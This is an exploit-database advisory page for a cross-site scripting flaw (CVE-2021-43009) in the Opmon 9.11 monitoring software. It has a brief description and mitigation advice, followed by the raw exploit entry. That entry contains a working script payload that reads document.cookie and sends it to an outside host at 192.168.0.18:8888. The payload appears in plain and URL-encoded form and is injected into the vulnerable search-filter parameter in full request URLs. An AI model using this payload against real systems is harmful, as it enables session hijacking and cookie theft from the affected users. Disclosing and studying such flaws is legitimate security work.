Opmon 9.11 - Cross-site Scripting

vendor:

Opmon

by:

p3tryx

6.1

CVSS

MEDIUM

Cross-site Scripting

CWE

Product Name: Opmon

Affected Version From: 9.11

Affected Version To: 9.11

Patch Exists: YES

Related CWE: CVE-2021-43009

CPE: a:opservices:opmon:9.11

Metasploit:

Other Scripts:

Platforms Tested: Chrome, IE, Firefox

2021

Opmon 9.11 – Cross-site Scripting

The Opmon version 9.11 is vulnerable to cross-site scripting (XSS) attacks. An attacker can inject malicious script code into certain input fields, which will be executed by the victim's browser. This can lead to session hijacking, cookie theft, or other malicious activities.

Mitigation:

To mitigate this vulnerability, it is recommended to sanitize and validate all user input before displaying it on web pages. Implementing Content Security Policy (CSP) headers can also help prevent XSS attacks.

Source

Exploit-DB raw data:

# Exploit Title: Opmon 9.11 - Cross-site Scripting
# Date: 2021-06-01
# Exploit Author: p3tryx
# Vendor Homepage: https://www.opservices.com.br/monitoramento-real-time
# Version: 9.11
# Tested on: Chrome, IE and Firefox
# CVE : CVE-2021-43009

# URL POC:

<script>
alert(document.cookie);
var i=new Image;
i.src="http://192.168.0.18:8888/?"+document.cookie;
</script>

Url-encoded Payload

%3Cscript%3E%0Aalert%28document.cookie%29%3B%0Avar%20i%3Dnew%20Image%3B%0Ai.src%3D%22http%3A%2F%2F192.168.0.18%3A8888%2F%3F%22%2Bdocument.cookie%3B%0A%3C%2Fscript%3E

```
*https://192.168.1.100/opmon/seagull/www/index.php/opinterface/action/redirect/initial_page=/opmon/seagull/www/index.php/statusgrid/action/hosts/filter*
<https://opmon/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/statusgrid/action/hosts/?filter>
[search]=%27};PAYLOAD&x=0&y=0

*https://192.168.1.100/opmon/seagull/www/index.php/opinterface/action/redirect/initial_page=/opmon/seagull/www/index.php/statusgrid/action/hosts/filter*
<https://opmon/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/statusgrid/action/hosts/?filter>
[search]=%27};
%3Cscript%3E%0Aalert%28document.cookie%29%3B%0Avar%20i%3Dnew%20Image%3B%0Ai.src%3D%22http%3A%2F%2F192.168.0.18%3A8888%2F%3F%22%2Bdocument.cookie%3B%0A%3C%2Fscript%3E
&x=0&y=0

```